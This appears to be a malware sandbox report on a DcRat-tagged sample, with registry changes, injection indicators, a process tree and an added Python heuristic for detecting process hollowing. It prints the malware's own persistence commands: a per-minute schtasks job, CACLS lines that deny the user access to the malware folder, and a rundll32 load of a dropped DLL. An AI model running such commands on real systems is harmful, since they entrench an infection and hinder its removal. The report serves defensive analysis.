31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. 
Europe Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-3142 = "South Sudan Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1684 AppLaunch.exe 1684 AppLaunch.exe 3484 3nN42tm.exe 3484 3nN42tm.exe 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE -
Suspicious behavior: MapViewOfSection 2 IoCs
pid | Process
3484 | 3nN42tm.exe
5544 | toolspub2.exe
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs
pid Process 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1684 AppLaunch.exe Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeDebugPrivilege 5628 4891.exe Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeDebugPrivilege 4020 4C4C.exe Token: SeShutdownPrivilege 3300 
Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeDebugPrivilege 3484 Conhost.exe Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE -
Suspicious use of FindShellTrayWindow 26 IoCs
pid Process (count)
368 msedge.exe (25)
1032 LzmwAqmV.tmp (1)
Suspicious use of SendNotifyMessage 24 IoCs
pid Process (count)
368 msedge.exe (24)
Suspicious use of UnmapMainImage 1 IoCs
pid Process 3300 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description: one record per WriteProcessMemory call, "PID <writer> wrote to memory of <target> <writer> <writer image> <target procid>", collapsed here to one row per writer/target pair with the number of calls (64 records in all; the listing ends part-way through the last pair).

writer PID | writer image | target PID | target procid | calls
3012 | 44117aa4ffc3de9f9176bbbcfa9445aeb7e735e83b7928d8a6cc57e1eb67f0e1.exe | 2724 | 89 | 3
2724 | ji2Rk63.exe | 1660 | 91 | 3
1660 | An5dW77.exe | 1996 | 92 | 3
1996 | Ec1Qz04.exe | 3236 | 93 | 3
3236 | hi3HF41.exe | 2472 | 94 | 3
2472 | fU6tW83.exe | 4388 | 95 | 3
4388 | 1ap54Lf4.exe | 1684 | 96 | 8
2472 | fU6tW83.exe | 3296 | 97 | 3
3296 | 2cN4918.exe | 1564 | 101 | 3
3296 | 2cN4918.exe | 884 | 102 | 10
3236 | hi3HF41.exe | 3484 | 103 | 3
1996 | Ec1Qz04.exe | 2784 | 106 | 3
2784 | 4NF601SA.exe | 3364 | 107 | 8
1660 | An5dW77.exe | 4408 | 108 | 3
4408 | 5JG7nd9.exe | 2468 | 109 | 3
2724 | ji2Rk63.exe | 4708 | 110 | 2

Every plain parent-to-child creation in this run shows exactly three writes. The three rows with 8 or 10 calls are 1ap54Lf4.exe, 2cN4918.exe and 4NF601SA.exe writing into AppLaunch.exe children they spawned; each of those writers is also flagged for SetThreadContext in the process tree, the combination consistent with process hollowing of the .NET host. PID 884 later crashes (WerFault -p 884 below).
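The WriteProcessMemory list above is raw, one line per call. The Python below is an added example, not sandbox output, that collapses such lines, rebuilds the writer-to-target chain and applies a heuristic (an assumption of this example, not a sandbox rule): a writer that makes markedly more writes into one child than the three every ordinary creation shows here, and that the report also flags for SetThreadContext, is treated as hollowing that child. The sample records are 17 lines copied from the list; the SetThreadContext PID set is taken from the process tree below.

```python
import re
from collections import Counter

# Record format as the sandbox prints it, one record per WriteProcessMemory call:
#   "PID <writer> wrote to memory of <target> <writer> <writer image> <target procid>"
RECORD = re.compile(
    r"PID (?P<writer>\d+) wrote to memory of (?P<target>\d+) "
    r"(?P=writer) (?P<image>\S+) (?P<procid>\d+)$"
)

# Constructed excerpt: 17 of the 64 records in the list above, copied verbatim.
SAMPLE_RECORDS = """
PID 3236 wrote to memory of 2472 3236 hi3HF41.exe 94
PID 3236 wrote to memory of 2472 3236 hi3HF41.exe 94
PID 3236 wrote to memory of 2472 3236 hi3HF41.exe 94
PID 2472 wrote to memory of 4388 2472 fU6tW83.exe 95
PID 2472 wrote to memory of 4388 2472 fU6tW83.exe 95
PID 2472 wrote to memory of 4388 2472 fU6tW83.exe 95
PID 4388 wrote to memory of 1684 4388 1ap54Lf4.exe 96
PID 4388 wrote to memory of 1684 4388 1ap54Lf4.exe 96
PID 4388 wrote to memory of 1684 4388 1ap54Lf4.exe 96
PID 4388 wrote to memory of 1684 4388 1ap54Lf4.exe 96
PID 4388 wrote to memory of 1684 4388 1ap54Lf4.exe 96
PID 4388 wrote to memory of 1684 4388 1ap54Lf4.exe 96
PID 4388 wrote to memory of 1684 4388 1ap54Lf4.exe 96
PID 4388 wrote to memory of 1684 4388 1ap54Lf4.exe 96
PID 2472 wrote to memory of 3296 2472 fU6tW83.exe 97
PID 2472 wrote to memory of 3296 2472 fU6tW83.exe 97
PID 2472 wrote to memory of 3296 2472 fU6tW83.exe 97
"""

# PIDs the process tree below flags with "Suspicious use of SetThreadContext".
SET_THREAD_CONTEXT = {"4388", "3296", "2784", "5148", "5780"}


def parse_writes(text):
    """Collapse one-line-per-call records into {(writer, target, writer_image): calls}."""
    counts = Counter()
    for line in text.splitlines():
        m = RECORD.match(line.strip())
        if m:
            counts[(m["writer"], m["target"], m["image"])] += 1
    return counts


def hollowing_candidates(counts, set_thread_context, baseline=3):
    """Heuristic, an assumption of this example rather than a sandbox rule: every plain
    parent->child creation in this report shows exactly three writes (CreateProcess
    passing startup data). A writer that makes noticeably more writes into one child
    and also calls SetThreadContext matches the hollowing sequence: create suspended,
    overwrite the image, redirect the main thread, resume."""
    hits = [(w, t, img, n) for (w, t, img), n in counts.items()
            if n > baseline and w in set_thread_context]
    return sorted(hits, key=lambda h: -h[3])


def injection_chain(counts, leaf):
    """Follow writer->target edges back from `leaf` to the top of the chain."""
    parent = {target: writer for (writer, target, _img) in counts}
    chain = [leaf]
    while chain[-1] in parent:
        chain.append(parent[chain[-1]])
    return chain[::-1]


if __name__ == "__main__":
    writes = parse_writes(SAMPLE_RECORDS)
    for w, t, img, n in hollowing_candidates(writes, SET_THREAD_CONTEXT):
        print(f"{img} ({w}) wrote {n}x into {t}: {' -> '.join(injection_chain(writes, t))}")
```

Run against the full 64-record list, the same code also surfaces 2cN4918.exe (10 writes into 884) and 4NF601SA.exe (8 writes into 3364); the baseline of three is specific to this report and should be re-derived per sandbox and per architecture.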
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
Indentation follows the depth markers of the original tree (1⤵ … 10⤵): each entry gives the image path, the command line, the report's behaviour flags and the PID. PIDs are reused during the run (3020, 3484, 3552, 3632, 4760 and 6140 each belong to more than one process), so correlate on image path and parent chain, not on PID alone.

[1] C:\Windows\Explorer.EXE
    cmd: C:\Windows\Explorer.EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of UnmapMainImage
    PID:3300
  [2] C:\Users\Admin\AppData\Local\Temp\44117aa4ffc3de9f9176bbbcfa9445aeb7e735e83b7928d8a6cc57e1eb67f0e1.exe
      cmd: "C:\Users\Admin\AppData\Local\Temp\44117aa4ffc3de9f9176bbbcfa9445aeb7e735e83b7928d8a6cc57e1eb67f0e1.exe"
      - DcRat
      - Adds Run key to start application
      - Suspicious use of WriteProcessMemory
      PID:3012
    [3] C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ji2Rk63.exe
        cmd: C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ji2Rk63.exe
        - Executes dropped EXE
        - Adds Run key to start application
        - Suspicious use of WriteProcessMemory
        PID:2724
      [4] C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\An5dW77.exe
          cmd: C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\An5dW77.exe
          - Executes dropped EXE
          - Adds Run key to start application
          - Suspicious use of WriteProcessMemory
          PID:1660
        [5] C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Ec1Qz04.exe
            cmd: C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Ec1Qz04.exe
            - Executes dropped EXE
            - Adds Run key to start application
            - Suspicious use of WriteProcessMemory
            PID:1996
          [6] C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\hi3HF41.exe
              cmd: C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\hi3HF41.exe
              - Executes dropped EXE
              - Adds Run key to start application
              - Suspicious use of WriteProcessMemory
              PID:3236
            [7] C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\fU6tW83.exe
                cmd: C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\fU6tW83.exe
                - Executes dropped EXE
                - Adds Run key to start application
                - Suspicious use of WriteProcessMemory
                PID:2472
              [8] C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1ap54Lf4.exe
                  cmd: C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1ap54Lf4.exe
                  - Executes dropped EXE
                  - Suspicious use of SetThreadContext
                  - Suspicious use of WriteProcessMemory
                  PID:4388
                [9] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                    cmd: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                    - Modifies Windows Defender Real-time Protection settings
                    - Suspicious behavior: EnumeratesProcesses
                    - Suspicious use of AdjustPrivilegeToken
                    PID:1684
              [8] C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2cN4918.exe
                  cmd: C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2cN4918.exe
                  - Executes dropped EXE
                  - Suspicious use of SetThreadContext
                  - Suspicious use of WriteProcessMemory
                  PID:3296
                [9] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                    cmd: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                    PID:1564
                [9] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                    cmd: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                    PID:884
                  [10] C:\Windows\SysWOW64\WerFault.exe
                       cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 884 -s 196
                       - Program crash
                       PID:4168
            [7] C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3nN42tm.exe
                cmd: C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3nN42tm.exe
                - Executes dropped EXE
                - Checks SCSI registry key(s)
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious behavior: MapViewOfSection
                PID:3484
          [6] C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4NF601SA.exe
              cmd: C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4NF601SA.exe
              - Executes dropped EXE
              - Suspicious use of SetThreadContext
              - Suspicious use of WriteProcessMemory
              PID:2784
            [7] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                cmd: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                PID:3364
        [5] C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5JG7nd9.exe
            cmd: C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5JG7nd9.exe
            - Checks computer location settings
            - Executes dropped EXE
            - Suspicious use of WriteProcessMemory
            PID:4408
          [6] C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
              cmd: "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"
              - Checks computer location settings
              - Executes dropped EXE
              PID:2468
            [7] C:\Windows\SysWOW64\schtasks.exe
                cmd: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
                - DcRat
                - Creates scheduled task(s)
                PID:4760
            [7] C:\Windows\SysWOW64\cmd.exe
                cmd: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit
                PID:4780
              [8] C:\Windows\SysWOW64\cmd.exe
                  cmd: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  PID:1340
              [8] C:\Windows\SysWOW64\cacls.exe
                  cmd: CACLS "explothe.exe" /P "Admin:N"
                  PID:2308
              [8] C:\Windows\SysWOW64\cacls.exe
                  cmd: CACLS "explothe.exe" /P "Admin:R" /E
                  PID:1592
              [8] C:\Windows\SysWOW64\cmd.exe
                  cmd: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  PID:564
              [8] C:\Windows\SysWOW64\cacls.exe
                  cmd: CACLS "..\fefffe8cea" /P "Admin:N"
                  PID:3080
              [8] C:\Windows\SysWOW64\cacls.exe
                  cmd: CACLS "..\fefffe8cea" /P "Admin:R" /E
                  PID:2448
            [7] C:\Windows\SysWOW64\rundll32.exe
                cmd: "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
                - Loads dropped DLL
                PID:264
      [4] C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Md9pf5.exe
          cmd: C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Md9pf5.exe
          - Executes dropped EXE
          PID:4708
    [3] C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Rt5OT77.exe
        cmd: C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Rt5OT77.exe
        - Executes dropped EXE
        PID:2264
      [4] C:\Windows\system32\cmd.exe
          cmd: "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\126A.tmp\126B.tmp\126C.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Rt5OT77.exe"
          PID:3632
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
            PID:2152
          [6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffdf1d746f8,0x7ffdf1d74708,0x7ffdf1d74718
              PID:1132
          [6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,7634152411313414620,14593951686294844859,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:3
              PID:3020
          [6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,7634152411313414620,14593951686294844859,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
              PID:3552
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/
            - Enumerates system info in registry
            - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
            - Suspicious use of FindShellTrayWindow
            - Suspicious use of SendNotifyMessage
            PID:368
          [6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffdf1d746f8,0x7ffdf1d74708,0x7ffdf1d74718
              PID:4036
          [6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,9897252923422389749,3378452451361649956,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3
              PID:3224
          [6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,9897252923422389749,3378452451361649956,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2
              PID:2536
          [6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,9897252923422389749,3378452451361649956,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2604 /prefetch:8
              PID:3540
          [6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9897252923422389749,3378452451361649956,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:1
              PID:1376
          [6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9897252923422389749,3378452451361649956,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3208 /prefetch:1
              PID:3752
          [6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9897252923422389749,3378452451361649956,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3740 /prefetch:1
              PID:4088
          [6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9897252923422389749,3378452451361649956,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2976 /prefetch:1
              PID:5160
          [6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9897252923422389749,3378452451361649956,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4880 /prefetch:1
              PID:5316
          [6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9897252923422389749,3378452451361649956,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4864 /prefetch:1
              PID:5308
          [6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9897252923422389749,3378452451361649956,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6040 /prefetch:1
              PID:6140
          [6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9897252923422389749,3378452451361649956,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6056 /prefetch:1
              PID:1172
          [6] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
              cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,9897252923422389749,3378452451361649956,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6100 /prefetch:8
              PID:3632
          [6] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
              cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,9897252923422389749,3378452451361649956,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6100 /prefetch:8
              PID:5492
          [6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
